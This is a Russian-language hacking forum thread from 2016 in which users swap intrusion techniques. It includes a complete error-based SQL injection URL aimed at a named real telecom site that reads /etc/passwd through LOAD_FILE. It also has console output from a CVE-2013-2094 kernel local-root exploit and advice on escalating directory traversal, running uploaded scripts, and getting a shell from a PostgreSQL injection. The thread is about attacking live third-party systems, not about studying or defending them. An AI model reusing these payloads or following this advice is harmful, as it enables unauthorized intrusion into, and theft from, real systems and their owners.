HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1141  
Старый 15.02.2016, 23:24
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Цитата:
Сообщение от ghost8  
ghost8 said:

Код:
Code:
select load_file(0x2f6574632f706173737764); // читаем /etc/passwd
http://my.moldtelecom.md/scripturi/...16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+

возврашяет тру но нету вывода
 
Ответить с цитированием

  #1142  
Старый 16.02.2016, 13:05
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Вектор еррор, вчера тоже тестил

load_file(hex(0x2f6574632f706173737764))

0x2f6574632f706173737764 это /etc/passwd

п.с сам до конца не разобрался
 
Ответить с цитированием

  #1143  
Старый 16.02.2016, 16:19
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Прочитать файл или что то залить я вижу что не как
 
Ответить с цитированием

  #1144  
Старый 16.02.2016, 18:46
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Прочитать файл или что то залить я вижу что не как
Читать можно

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=%20AND%20(SELECT%208838%20FROM(SELECT%20COUNT(*),CONCAT((MID((IFNULL(CAST(hex(LOAD_FILE(0x2f6574632f706173737764))%20AS%20CHAR),0x2020)),55,54)),%201,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)+--+-[/COLOR][/COLOR] 
Скажите "Спасибо фазе"
 
Ответить с цитированием

  #1145  
Старый 20.02.2016, 10:47
z0mbie866
Guest
Сообщений: n/a
Провел на форуме:
798

Репутация: 0
По умолчанию

Имеется Directory traversal (Не LFI) на windows. Файлы типа SAM прочитать нет возможности. Помимо этого имеется apache на другом порту. Как можно найти полный путь до этого апача или как можно получить доступ к самому серверу?
 
Ответить с цитированием

  #1146  
Старый 20.02.2016, 11:33
Saint-Sky
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
Провел на форуме:
1888785

Репутация: 305
По умолчанию

Цитата:
Сообщение от z0mbie866  
z0mbie866 said:

Имеется Directory traversal (Не LFI) на windows. Файлы типа SAM прочитать нет возможности. Помимо этого имеется apache на другом порту. Как можно найти полный путь до этого апача или как можно получить доступ к самому серверу?
Никак. Данной уязвимости(за исключением крайне редких случаев) типа "Directory traversal" недостаточно для проникновения - надо копнуть глубже...

Пути апача по дефолту в винде гуглятся, а не по дефолту - никак не узнаешь без читалки...
 
Ответить с цитированием

  #1147  
Старый 20.02.2016, 13:35
z0mbie866
Guest
Сообщений: n/a
Провел на форуме:
798

Репутация: 0
По умолчанию

Имеется cms написанная на node.js, есть возможность заливать файлы. Но web сервер nodejs не позволяет запускать скрипты, можно ли их выполнить?
 
Ответить с цитированием

  #1148  
Старый 21.02.2016, 17:10
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

столкнулся с проблемой

рутать пытаюсь сплоитом CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86/x86_64

Linux 2.6.34.7-56.40.x86_64 #1 SMP Fri Oct 22 18:48:49 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux

Compiling exp_abacus.c...OK.

[+] Resolved set_fs_root to 0xffffffff810e8af8

[+] Resolved set_fs_pwd to 0xffffffff810e8a96

[+] Resolved __virt_addr_valid to 0xffffffff8102a87c

[+] Resolved init_task to 0xffffffff816c9020

[+] Resolved init_fs to 0xffffffff816d9900

[+] Resolved default_exec_domain to 0xffffffff816d0660

[+] Resolved bad_file_ops to 0xffffffff81412da0

[+] Resolved bad_file_aio_read to 0xffffffff810dd407

[+] Resolved selinux_enforcing to 0xffffffff8194b968

[+] Resolved selinux_enabled to 0xffffffff8194b964

[+] Resolved security_ops to 0xffffffff8194a110

[+] Resolved default_security_ops to 0xffffffff816dc0b0

[+] Resolved sel_read_enforce to 0xffffffff81134709

[+] Resolved audit_enabled to 0xffffffff81909414

[+] Resolved commit_creds to 0xffffffff81057c93

[+] Resolved prepare_kernel_cred to 0xffffffff81057b8a

[+] Resolved xen_start_info to 0xffffffff81886308

[+] Resolved ptmx_fops to 0xffffffff819564e0

[+] Resolved mark_rodata_ro to 0xffffffff81026458

[+] Resolved set_kernel_text_ro to 0xffffffff81026421

[+] Resolved make_lowmem_page_readonly to 0xffffffff81004fdf

[+] Resolved make_lowmem_page_readwrite to 0xffffffff81004f1b

[-] System rejected creation of perf event.

plus Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.65-1+deb7u1 x86_64

Compiling exp_abacus.c...OK.

[+] Resolved set_fs_root to 0xffffffff8111cf7b

[+] Resolved set_fs_pwd to 0xffffffff8111cfda

[+] Resolved __virt_addr_valid to 0xffffffff81030c84

[+] Resolved init_task to 0xffffffff8160d020 (via System.map)

[+] Resolved init_fs to 0xffffffff8162dd20 (via System.map)

[+] Resolved default_exec_domain to 0xffffffff81617610 (via System.map)

[+] Resolved bad_file_ops to 0xffffffff81412cc0 (via System.map)

[+] Resolved bad_file_aio_read to 0xffffffff8110f030

[+] Resolved selinux_enforcing to 0xffffffff817ecbb8 (via System.map)

[+] Resolved selinux_enabled to 0xffffffff81634640 (via System.map)

[+] Resolved apparmor_enabled to 0xffffffff81635b8c (via System.map)

[+] Resolved security_ops to 0xffffffff817eb370 (via System.map)

[+] Resolved default_security_ops to 0xffffffff81630ae0 (via System.map)

[+] Resolved sel_read_enforce to 0xffffffff8116cd0f

[+] Resolved audit_enabled to 0xffffffff817b217c (via System.map)

[+] Resolved commit_creds to 0xffffffff8106439e

[+] Resolved prepare_kernel_cred to 0xffffffff81064657

[+] Resolved xen_start_info to 0xffffffff8172fd38 (via System.map)

[+] Resolved ptmx_fops to 0xffffffff817fa020 (via System.map)

[+] Resolved mark_rodata_ro to 0xffffffff8102dc73

[+] Resolved set_kernel_text_ro to 0xffffffff8102dc41

[+] Resolved make_lowmem_page_readonly to 0xffffffff8100627e

[+] Resolved make_lowmem_page_readwrite to 0xffffffff810062b2

[-] System rejected creation of perf event.
 
Ответить с цитированием

  #1149  
Старый 22.02.2016, 02:13
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от z0mbie866  
z0mbie866 said:

Имеется cms написанная на node.js, есть возможность заливать файлы. Но web сервер nodejs не позволяет запускать скрипты, можно ли их выполнить?
Можно попробовать перезаписать существующие скрипты или положить свои в директорию с автоподключением. Все зависит от ваших прав и программного обеспечения. Если абстрагироваться от node - выбор у вас большой: различные start.sh, каталоги с конфигами, bashrc и т.п.

Имеет смысл поискать CVE, позволяющие выполнить код с правами определенного приложения. Их довольно много.
 
Ответить с цитированием

  #1150  
Старый 01.03.2016, 07:51
Waki
Guest
Сообщений: n/a
Провел на форуме:
19071

Репутация: 10
По умолчанию

Есть postgres с такими правами

Код:
Code:[*] 
postgres (administrator) [3]:
    privilege: catupd
    privilege: createdb
    privilege: super
Код:
Code:
boolean-based blind
Vector: OR NOT [INFERENCE]
Пробовал это https://rdot.org/forum/showthread.php?t=24

Но не проходит стакед запрос, как можно залиться?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ